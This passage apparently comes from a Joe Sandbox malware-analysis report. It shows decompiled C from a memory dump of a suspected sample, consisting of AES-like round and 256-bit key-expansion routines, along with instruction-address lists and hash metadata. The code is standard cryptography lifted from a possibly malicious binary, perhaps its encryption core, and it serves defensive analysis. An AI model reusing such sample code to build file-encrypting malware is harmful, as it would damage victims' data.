                                    					_t564 = 0;
                                    				} else {
                                    					if(_t851 == 0xc0) {
                                    						L5:
                                    						_t1129 =  &(_t997[4]);
                                    						 *_t1179 = _t1129;
                                    						asm("rol ebx, 0x10");
                                    						_t566 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
                                    						_t820 = _t739 >> 0x10;
                                    						_t567 = _t566 >> 0x10;
                                    						_t732 = _t712 >> 0x10;
                                    						_t733 = _t1129[2] ^  *(0xf14a240 + (_t712 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t739 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t567 & 0x000000ff) * 4);
                                    						_t827 = _t1129[3] ^  *(0xf14a240 + (_t739 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t513 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t732 & 0x000000ff) * 4);
                                    						_t1141 =  *_t1179;
                                    						_t569 =  *(0xf14a240 + (_t513 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t566 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t820 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t732 & 0x000000ff) * 4) ^  *_t1141;
                                    						_t685 =  *(0xf14aa40 + (_t820 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t712 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t566 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t567 & 0x000000ff) * 4) ^ _t1141[1];
                                    						_t1142 =  &(_t1141[4]);
                                    						 *_t1179 = _t1142;
                                    						asm("rol ebx, 0x10");
                                    						_t571 = _t569 & 0xffff0000 | _t685 >> 0x00000010;
                                    						_t828 = _t827 >> 0x10;
                                    						_t572 = _t571 >> 0x10;
                                    						_t734 = _t733 >> 0x10;
                                    						_t712 = _t1142[2] ^  *(0xf14a240 + (_t733 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t827 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t685 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t572 & 0x000000ff) * 4);
                                    						_t739 = _t1142[3] ^  *(0xf14a240 + (_t827 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t569 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t685 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t734 & 0x000000ff) * 4);
                                    						_t997 =  *_t1179;
                                    						_t513 =  *(0xf14a240 + (_t569 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t571 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t828 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t734 & 0x000000ff) * 4) ^  *_t997;
                                    						_t585 =  *(0xf14aa40 + (_t828 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t733 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t571 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t572 & 0x000000ff) * 4) ^ _t997[1];
                                    						goto L6;
                                    					} else {
                                    						if(_t851 == 0xe0) {
                                    							_t1154 =  &(_t997[4]);
                                    							 *_t1179 = _t1154;
                                    							asm("rol ebx, 0x10");
                                    							_t575 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
                                    							_t835 = _t739 >> 0x10;
                                    							_t576 = _t575 >> 0x10;
                                    							_t735 = _t712 >> 0x10;
                                    							_t736 = _t1154[2] ^  *(0xf14a240 + (_t712 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t739 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t576 & 0x000000ff) * 4);
                                    							_t842 = _t1154[3] ^  *(0xf14a240 + (_t739 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t513 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t735 & 0x000000ff) * 4);
                                    							_t1166 =  *_t1179;
                                    							_t578 =  *(0xf14a240 + (_t513 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t575 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t835 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t735 & 0x000000ff) * 4) ^  *_t1166;
                                    							_t702 =  *(0xf14aa40 + (_t835 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t712 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t575 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t576 & 0x000000ff) * 4) ^ _t1166[1];
                                    							_t1167 =  &(_t1166[4]);
                                    							 *_t1179 = _t1167;
                                    							asm("rol ebx, 0x10");
                                    							_t580 = _t578 & 0xffff0000 | _t702 >> 0x00000010;
                                    							_t843 = _t842 >> 0x10;
                                    							_t581 = _t580 >> 0x10;
                                    							_t737 = _t736 >> 0x10;
                                    							_t712 = _t1167[2] ^  *(0xf14a240 + (_t736 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t842 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t702 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t581 & 0x000000ff) * 4);
                                    							_t739 = _t1167[3] ^  *(0xf14a240 + (_t842 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t578 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t702 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t737 & 0x000000ff) * 4);
                                    							_t997 =  *_t1179;
                                    							_t513 =  *(0xf14a240 + (_t578 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t580 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t843 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t737 & 0x000000ff) * 4) ^  *_t997;
                                    							_t585 =  *(0xf14aa40 + (_t843 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t736 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t580 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t581 & 0x000000ff) * 4) ^ _t997[1];
                                    							goto L5;
                                    						} else {
                                    							_t564 = 0xffffffff;
                                    						}
                                    					}
                                    				}
                                    				return _t564;
                                    			}












































































































































                                    0x0f141023
                                    0x0f141027
                                    0x0f14102b
                                    0x0f14102f
                                    0x0f141033
                                    0x0f141042
                                    0x0f141046
                                    0x0f14104d
                                    0x0f141050
                                    0x0f141053
                                    0x0f141056
                                    0x0f14105f
                                    0x0f1413c7
                                    0x0f1413c7
                                    0x0f1413ca
                                    0x0f1413d3
                                    0x0f141424
                                    0x0f141426
                                    0x0f14145b
                                    0x0f14145e
                                    0x0f14148b
                                    0x0f14148d
                                    0x0f14148f
                                    0x0f141492
                                    0x0f141495
                                    0x0f141498
                                    0x0f14149b
                                    0x0f1414a4
                                    0x0f1414f5
                                    0x0f1414f7
                                    0x0f14152c
                                    0x0f14152f
                                    0x0f14155c
                                    0x0f14155e
                                    0x0f141560
                                    0x0f141563
                                    0x0f141566
                                    0x0f141569
                                    0x0f14156c
                                    0x0f141575
                                    0x0f1415c6
                                    0x0f1415c8
                                    0x0f1415fd
                                    0x0f141600
                                    0x0f14162d
                                    0x0f14162f
                                    0x0f141631
                                    0x0f141634
                                    0x0f141637
                                    0x0f14163a
                                    0x0f14163d
                                    0x0f141646
                                    0x0f141697
                                    0x0f141699
                                    0x0f1416ce
                                    0x0f1416d1
                                    0x0f1416fe
                                    0x0f141700
                                    0x0f141702
                                    0x0f141705
                                    0x0f141708
                                    0x0f14170b
                                    0x0f14170e
                                    0x0f141717
                                    0x0f141768
                                    0x0f14176a
                                    0x0f14179f
                                    0x0f1417a2
                                    0x0f1417cf
                                    0x0f1417d1
                                    0x0f1417d3
                                    0x0f1417d6
                                    0x0f1417d9
                                    0x0f1417dc
                                    0x0f1417df
                                    0x0f1417e8
                                    0x0f141839
                                    0x0f14183b
                                    0x0f141870
                                    0x0f141873
                                    0x0f1418a0
                                    0x0f1418a2
                                    0x0f1418a4
                                    0x0f1418a7
                                    0x0f1418aa
                                    0x0f1418ad
                                    0x0f1418b0
                                    0x0f1418b9
                                    0x0f14190a
                                    0x0f14190c
                                    0x0f141941
                                    0x0f141944
                                    0x0f141971
                                    0x0f141973
                                    0x0f141975
                                    0x0f141978
                                    0x0f14197b
                                    0x0f14197e
                                    0x0f141981
                                    0x0f14198a
                                    0x0f1419db
                                    0x0f1419dd
                                    0x0f141a12
                                    0x0f141a15
                                    0x0f141a42
                                    0x0f141a44
                                    0x0f141a46
                                    0x0f141a49
                                    0x0f141a4c
                                    0x0f141a4f
                                    0x0f141a52
                                    0x0f141a5b
                                    0x0f141aac
                                    0x0f141aae
                                    0x0f141ae3
                                    0x0f141ae6
                                    0x0f141b13
                                    0x0f141b15
                                    0x0f141b17
                                    0x0f141b1a
                                    0x0f141b1d
                                    0x0f141b20
                                    0x0f141b23
                                    0x0f141b2c
                                    0x0f141b7d
                                    0x0f141b7f
                                    0x0f141bb4
                                    0x0f141bb7
                                    0x0f141be4
                                    0x0f141bed
                                    0x0f141bf1
                                    0x0f141bf3
                                    0x0f141bf6
                                    0x0f141bf9
                                    0x0f141bfc
                                    0x0f141065
                                    0x0f14106b
                                    0x0f141225
                                    0x0f141225
                                    0x0f141228
                                    0x0f141231
                                    0x0f141282
                                    0x0f141284
                                    0x0f1412b9
                                    0x0f1412bc
                                    0x0f1412e9
                                    0x0f1412eb
                                    0x0f1412ed
                                    0x0f1412f0
                                    0x0f1412f3
                                    0x0f1412f6
                                    0x0f1412f9
                                    0x0f141302
                                    0x0f141353
                                    0x0f141355
                                    0x0f14138a
                                    0x0f14138d
                                    0x0f1413ba
                                    0x0f1413bc
                                    0x0f1413be
                                    0x0f1413c1
                                    0x0f1413c4
                                    0x00000000
                                    0x0f141071
                                    0x0f141077
                                    0x0f141083
                                    0x0f141086
                                    0x0f14108f
                                    0x0f1410e0
                                    0x0f1410e2
                                    0x0f141117
                                    0x0f14111a
                                    0x0f141147
                                    0x0f141149
                                    0x0f14114b
                                    0x0f14114e
                                    0x0f141151
                                    0x0f141154
                                    0x0f141157
                                    0x0f141160
                                    0x0f1411b1
                                    0x0f1411b3
                                    0x0f1411e8
                                    0x0f1411eb
                                    0x0f141218
                                    0x0f14121a
                                    0x0f14121c
                                    0x0f14121f
                                    0x0f141222
                                    0x00000000
                                    0x0f141079
                                    0x0f141079
                                    0x0f141079
                                    0x0f141077
                                    0x0f14106b
                                    0x0f141c11

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5bbc7a5c72dc1fd630f7eaacb7a4e45cf94f83f9b324bfc52eb2702eeb99509f
                                    • Instruction ID: 188da16929a31eba7bfc059746d7fb916c86299394acc490117fc3560510b241
                                    • Opcode Fuzzy Hash: 5bbc7a5c72dc1fd630f7eaacb7a4e45cf94f83f9b324bfc52eb2702eeb99509f
                                    • Instruction Fuzzy Hash: F3622935C442788FEB80DF6EE48402673A2ABC4333B4B4536AA505B297D63C7579BB74
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F148520(signed int _a4, intOrPtr* _a8) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				intOrPtr* _t274;
                                    				signed int _t284;
                                    				signed int _t287;
                                    				unsigned int _t289;
                                    				intOrPtr _t297;
                                    				signed int _t306;
                                    				signed int _t309;
                                    				unsigned int _t311;
                                    				intOrPtr _t319;
                                    				signed int _t328;
                                    				signed int _t331;
                                    				unsigned int _t333;
                                    				intOrPtr _t341;
                                    				signed int _t350;
                                    				signed int _t353;
                                    				unsigned int _t355;
                                    				intOrPtr _t363;
                                    				signed int _t372;
                                    				signed int _t375;
                                    				unsigned int _t377;
                                    				intOrPtr _t385;
                                    				signed int _t394;
                                    				signed int _t397;
                                    				unsigned int _t399;
                                    				intOrPtr _t407;
                                    				signed int _t416;
                                    				intOrPtr* _t420;
                                    				signed int _t421;
                                    				signed int _t422;
                                    				signed int _t423;
                                    				signed int _t424;
                                    				signed int _t425;
                                    				signed int _t426;
                                    				signed char _t427;
                                    				signed int _t428;
                                    				signed int _t429;
                                    				signed int _t430;
                                    				signed int _t431;
                                    				signed int _t441;
                                    				intOrPtr _t442;
                                    				signed int _t458;
                                    				intOrPtr _t459;
                                    				signed int _t475;
                                    				intOrPtr _t476;
                                    				signed int _t492;
                                    				intOrPtr _t493;
                                    				signed int _t509;
                                    				intOrPtr _t510;
                                    				signed int _t526;
                                    				intOrPtr _t527;
                                    				signed int _t542;
                                    				signed int _t543;
                                    				signed int _t544;
                                    				signed int _t545;
                                    				signed int _t546;
                                    				signed int _t547;
                                    				signed int _t548;
                                    				signed int _t549;
                                    				signed int _t551;
                                    				signed int _t553;
                                    				signed int _t554;
                                    				signed int _t555;
                                    				signed int _t556;
                                    				signed int _t557;
                                    				signed int _t558;
                                    				signed int _t559;
                                    				signed int _t561;
                                    				signed int _t562;
                                    				signed int _t563;
                                    				signed int _t564;
                                    				signed int _t565;
                                    				signed int _t566;
                                    				signed int _t567;
                                    				intOrPtr _t568;
                                    
                                    				_t274 = _a4;
                                    				_t420 = _a8;
                                    				_t428 =  *_t274;
                                    				_v12 = _t428;
                                    				 *_t420 = _t428;
                                    				_t429 =  *((intOrPtr*)(_t274 + 4));
                                    				 *((intOrPtr*)(_t420 + 4)) = _t429;
                                    				_v16 = _t429;
                                    				_t430 =  *((intOrPtr*)(_t274 + 8));
                                    				 *((intOrPtr*)(_t420 + 8)) = _t430;
                                    				_v8 = _t430;
                                    				_t431 =  *((intOrPtr*)(_t274 + 0xc));
                                    				 *((intOrPtr*)(_t420 + 0xc)) = _t431;
                                    				_t543 =  *(_t274 + 0x10);
                                    				 *(_t420 + 0x10) = _t543;
                                    				_t561 =  *(_t274 + 0x14);
                                    				 *(_t420 + 0x14) = _t561;
                                    				_a4 = _t431;
                                    				_t553 =  *(_t274 + 0x18);
                                    				 *(_t420 + 0x18) = _t553;
                                    				_t421 =  *(_t274 + 0x1c);
                                    				 *(_a8 + 0x1c) = _t421;
                                    				_t284 = _v12 ^  *(0xf14ba40 + (_t421 >> 0x18) * 4) ^  *(0xf14b640 + (_t421 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t421 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t421 & 0x000000ff) * 4) ^  *0xf14a200;
                                    				_v12 = _t284;
                                    				 *(_a8 + 0x20) = _t284;
                                    				_t441 = _v16 ^ _t284;
                                    				_v16 = _t441;
                                    				 *(_a8 + 0x24) = _t441;
                                    				_t287 = _v8 ^ _t441;
                                    				_t442 = _a8;
                                    				_v8 = _t287;
                                    				 *(_t442 + 0x28) = _t287;
                                    				_t289 = _a4 ^ _v8;
                                    				 *(_t442 + 0x2c) = _t289;
                                    				_a4 = _t289;
                                    				_t297 = _a8;
                                    				_t544 = _t543 ^  *(0xf14be40 + (_t289 >> 0x18) * 4) ^  *(0xf14ba40 + (_t289 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14b240 + (_a4 & 0x000000ff) * 4);
                                    				_t562 = _t561 ^ _t544;
                                    				_t554 = _t553 ^ _t562;
                                    				_t422 = _t421 ^ _t554;
                                    				 *(_t297 + 0x30) = _t544;
                                    				 *(_t297 + 0x34) = _t562;
                                    				 *(_t297 + 0x38) = _t554;
                                    				 *(_t297 + 0x3c) = _t422;
                                    				_t306 = _v12 ^  *(0xf14ba40 + (_t422 >> 0x18) * 4) ^  *(0xf14b640 + (_t422 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t422 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t422 & 0x000000ff) * 4) ^  *0xf14a204;
                                    				_v12 = _t306;
                                    				 *(_a8 + 0x40) = _t306;
                                    				_t458 = _v16 ^ _t306;
                                    				_v16 = _t458;
                                    				 *(_a8 + 0x44) = _t458;
                                    				_t309 = _v8 ^ _t458;
                                    				_t459 = _a8;
                                    				_v8 = _t309;
                                    				 *(_t459 + 0x48) = _t309;
                                    				_t311 = _a4 ^ _v8;
                                    				 *(_t459 + 0x4c) = _t311;
                                    				_a4 = _t311;
                                    				_t319 = _a8;
                                    				_t545 = _t544 ^  *(0xf14be40 + (_t311 >> 0x18) * 4) ^  *(0xf14ba40 + (_t311 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14b240 + (_a4 & 0x000000ff) * 4);
                                    				_t563 = _t562 ^ _t545;
                                    				_t555 = _t554 ^ _t563;
                                    				_t423 = _t422 ^ _t555;
                                    				 *(_t319 + 0x50) = _t545;
                                    				 *(_t319 + 0x54) = _t563;
                                    				 *(_t319 + 0x58) = _t555;
                                    				 *(_t319 + 0x5c) = _t423;
                                    				_t328 = _v12 ^  *(0xf14ba40 + (_t423 >> 0x18) * 4) ^  *(0xf14b640 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t423 & 0x000000ff) * 4) ^  *0xf14a208;
                                    				_v12 = _t328;
                                    				 *(_a8 + 0x60) = _t328;
                                    				_t475 = _v16 ^ _t328;
                                    				_v16 = _t475;
                                    				 *(_a8 + 0x64) = _t475;
                                    				_t331 = _v8 ^ _t475;
                                    				_t476 = _a8;
                                    				_v8 = _t331;
                                    				 *(_t476 + 0x68) = _t331;
                                    				_t333 = _a4 ^ _v8;
                                    				 *(_t476 + 0x6c) = _t333;
                                    				_a4 = _t333;
                                    				_t341 = _a8;
                                    				_t546 = _t545 ^  *(0xf14be40 + (_t333 >> 0x18) * 4) ^  *(0xf14ba40 + (_t333 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14b240 + (_a4 & 0x000000ff) * 4);
                                    				_t564 = _t563 ^ _t546;
                                    				_t556 = _t555 ^ _t564;
                                    				_t424 = _t423 ^ _t556;
                                    				 *(_t341 + 0x70) = _t546;
                                    				 *(_t341 + 0x74) = _t564;
                                    				 *(_t341 + 0x78) = _t556;
                                    				 *(_t341 + 0x7c) = _t424;
                                    				_t350 = _v12 ^  *(0xf14ba40 + (_t424 >> 0x18) * 4) ^  *(0xf14b640 + (_t424 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t424 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t424 & 0x000000ff) * 4) ^  *0xf14a20c;
                                    				_v12 = _t350;
                                    				 *(_a8 + 0x80) = _t350;
                                    				_t492 = _v16 ^ _t350;
                                    				_v16 = _t492;
                                    				 *(_a8 + 0x84) = _t492;
                                    				_t353 = _v8 ^ _t492;
                                    				_t493 = _a8;
                                    				_v8 = _t353;
                                    				 *(_t493 + 0x88) = _t353;
                                    				_t355 = _a4 ^ _v8;
                                    				 *(_t493 + 0x8c) = _t355;
                                    				_a4 = _t355;
                                    				_t363 = _a8;
                                    				_t547 = _t546 ^  *(0xf14be40 + (_t355 >> 0x18) * 4) ^  *(0xf14ba40 + (_t355 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14b240 + (_a4 & 0x000000ff) * 4);
                                    				_t565 = _t564 ^ _t547;
                                    				_t557 = _t556 ^ _t565;
                                    				 *(_t363 + 0x90) = _t547;
                                    				 *(_t363 + 0x94) = _t565;
                                    				 *(_t363 + 0x98) = _t557;
                                    				_t425 = _t424 ^ _t557;
                                    				 *(_t363 + 0x9c) = _t425;
                                    				_t372 = _v12 ^  *(0xf14ba40 + (_t425 >> 0x18) * 4) ^  *(0xf14b640 + (_t425 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t425 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t425 & 0x000000ff) * 4) ^  *0xf14a210;
                                    				_v12 = _t372;
                                    				 *(_a8 + 0xa0) = _t372;
                                    				_t509 = _v16 ^ _t372;
                                    				_v16 = _t509;
                                    				 *(_a8 + 0xa4) = _t509;
                                    				_t375 = _v8 ^ _t509;
                                    				_t510 = _a8;
                                    				_v8 = _t375;
                                    				 *(_t510 + 0xa8) = _t375;
                                    				_t377 = _a4 ^ _v8;
                                    				 *(_t510 + 0xac) = _t377;
                                    				_a4 = _t377;
                                    				_t385 = _a8;
                                    				_t548 = _t547 ^  *(0xf14be40 + (_t377 >> 0x18) * 4) ^  *(0xf14ba40 + (_t377 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14b240 + (_a4 & 0x000000ff) * 4);
                                    				_t566 = _t565 ^ _t548;
                                    				_t558 = _t557 ^ _t566;
                                    				_t426 = _t425 ^ _t558;
                                    				 *(_t385 + 0xb0) = _t548;
                                    				 *(_t385 + 0xb4) = _t566;
                                    				 *(_t385 + 0xb8) = _t558;
                                    				 *(_t385 + 0xbc) = _t426;
                                    				_t394 = _v12 ^  *(0xf14ba40 + (_t426 >> 0x18) * 4) ^  *(0xf14b640 + (_t426 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t426 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t426 & 0x000000ff) * 4) ^  *0xf14a214;
                                    				_v12 = _t394;
                                    				 *(_a8 + 0xc0) = _t394;
                                    				_t526 = _v16 ^ _t394;
                                    				_v16 = _t526;
                                    				 *(_a8 + 0xc4) = _t526;
                                    				_t397 = _v8 ^ _t526;
                                    				_t527 = _a8;
                                    				_v8 = _t397;
                                    				 *(_t527 + 0xc8) = _t397;
                                    				_t399 = _a4 ^ _v8;
                                    				 *(_t527 + 0xcc) = _t399;
                                    				_a4 = _t399;
                                    				_t407 = _a8;
                                    				_t549 = _t548 ^  *(0xf14be40 + (_t399 >> 0x18) * 4) ^  *(0xf14ba40 + (_t399 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14b240 + (_a4 & 0x000000ff) * 4);
                                    				_t567 = _t566 ^ _t549;
                                    				_t559 = _t558 ^ _t567;
                                    				_t427 = _t426 ^ _t559;
                                    				 *(_t407 + 0xd4) = _t567;
                                    				_t568 = _t407;
                                    				 *(_t407 + 0xd0) = _t549;
                                    				 *(_t568 + 0xd8) = _t559;
                                    				 *(_t568 + 0xdc) = _t427;
                                    				_t416 = _v12 ^  *(0xf14ba40 + (_t427 >> 0x18) * 4) ^  *(0xf14b640 + (_t427 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t427 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t427 & 0x000000ff) * 4) ^  *0xf14a218;
                                    				 *((intOrPtr*)(_t568 + 0xf0)) = 0;
                                    				_t542 = _v16 ^ _t416;
                                    				 *(_t568 + 0xe0) = _t416;
                                    				_t551 = _v8 ^ _t542;
                                    				 *(_t568 + 0xe4) = _t542;
                                    				 *(_t568 + 0xec) = _a4 ^ _t551;
                                    				 *(_t568 + 0xe8) = _t551;
                                    				 *((char*)(_t568 + 0xf0)) = 0xe0;
                                    				return 0;
                                    			}
















































































                                    0x0f148526
                                    0x0f14852a
                                    0x0f14852e
                                    0x0f148530
                                    0x0f148533
                                    0x0f148535
                                    0x0f148538
                                    0x0f14853b
                                    0x0f14853e
                                    0x0f148541
                                    0x0f148544
                                    0x0f148547
                                    0x0f14854a
                                    0x0f14854d
                                    0x0f148550
                                    0x0f148553
                                    0x0f148556
                                    0x0f148559
                                    0x0f14855d
                                    0x0f148560
                                    0x0f148563
                                    0x0f14856e
                                    0x0f1485a9
                                    0x0f1485ae
                                    0x0f1485b1
                                    0x0f1485b7
                                    0x0f1485bc
                                    0x0f1485bf
                                    0x0f1485c5
                                    0x0f1485c7
                                    0x0f1485ca
                                    0x0f1485cd
                                    0x0f1485d3
                                    0x0f1485d6
                                    0x0f1485db
                                    0x0f148612
                                    0x0f148615
                                    0x0f148617
                                    0x0f148619
                                    0x0f14861b
                                    0x0f14861d
                                    0x0f148620
                                    0x0f148623
                                    0x0f148626
                                    0x0f148666
                                    0x0f14866b
                                    0x0f14866e
                                    0x0f148674
                                    0x0f148679
                                    0x0f14867c
                                    0x0f148682
                                    0x0f148684
                                    0x0f148687
                                    0x0f14868a
                                    0x0f148690
                                    0x0f148693
                                    0x0f148698
                                    0x0f1486cf
                                    0x0f1486d2
                                    0x0f1486d4
                                    0x0f1486d6
                                    0x0f1486d8
                                    0x0f1486da
                                    0x0f1486df
                                    0x0f1486e2
                                    0x0f1486e5
                                    0x0f148723
                                    0x0f148728
                                    0x0f14872b
                                    0x0f148731
                                    0x0f148736
                                    0x0f148739
                                    0x0f14873f
                                    0x0f148741
                                    0x0f148744
                                    0x0f148747
                                    0x0f14874d
                                    0x0f148750
                                    0x0f148755
                                    0x0f14878c
                                    0x0f14878f
                                    0x0f148791
                                    0x0f148793
                                    0x0f148795
                                    0x0f148797
                                    0x0f14879c
                                    0x0f14879f
                                    0x0f1487a2
                                    0x0f1487e0
                                    0x0f1487e5
                                    0x0f1487e8
                                    0x0f1487f1
                                    0x0f1487f6
                                    0x0f1487f9
                                    0x0f148802
                                    0x0f148804
                                    0x0f148807
                                    0x0f14880a
                                    0x0f148813
                                    0x0f148816
                                    0x0f14881e
                                    0x0f148855
                                    0x0f148858
                                    0x0f14885a
                                    0x0f14885c
                                    0x0f14885e
                                    0x0f148864
                                    0x0f14886a
                                    0x0f148870
                                    0x0f148872
                                    0x0f1488b5
                                    0x0f1488ba
                                    0x0f1488bd
                                    0x0f1488c6
                                    0x0f1488cb
                                    0x0f1488ce
                                    0x0f1488d7
                                    0x0f1488d9
                                    0x0f1488dc
                                    0x0f1488df
                                    0x0f1488e8
                                    0x0f1488eb
                                    0x0f1488f3
                                    0x0f14892a
                                    0x0f14892d
                                    0x0f14892f
                                    0x0f148931
                                    0x0f148933
                                    0x0f148935
                                    0x0f14893d
                                    0x0f148943
                                    0x0f148949
                                    0x0f14898a
                                    0x0f14898f
                                    0x0f148992
                                    0x0f14899b
                                    0x0f1489a0
                                    0x0f1489a3
                                    0x0f1489ac
                                    0x0f1489ae
                                    0x0f1489b1
                                    0x0f1489b4
                                    0x0f1489bd
                                    0x0f1489c0
                                    0x0f1489c8
                                    0x0f1489ff
                                    0x0f148a02
                                    0x0f148a04
                                    0x0f148a06
                                    0x0f148a08
                                    0x0f148a0a
                                    0x0f148a12
                                    0x0f148a14
                                    0x0f148a25
                                    0x0f148a2b
                                    0x0f148a65
                                    0x0f148a67
                                    0x0f148a74
                                    0x0f148a76
                                    0x0f148a7f
                                    0x0f148a83
                                    0x0f148a89
                                    0x0f148a91
                                    0x0f148a97
                                    0x0f148aa3

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 53d16e5e0eaf815bdecd4ede47716bff353f776d7f20817246c70662c366d878
                                    • Instruction ID: d4e2c282e63b95ef54edf7bc4759c524b2d907c4659d084e3ca53b0ed21d6480
                                    • Opcode Fuzzy Hash: 53d16e5e0eaf815bdecd4ede47716bff353f776d7f20817246c70662c366d878
                                    • Instruction Fuzzy Hash: 2212E874A141189FCB48CF29D49096ABBF1FB8D311B5280BEE90ADB382C734EA55DB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
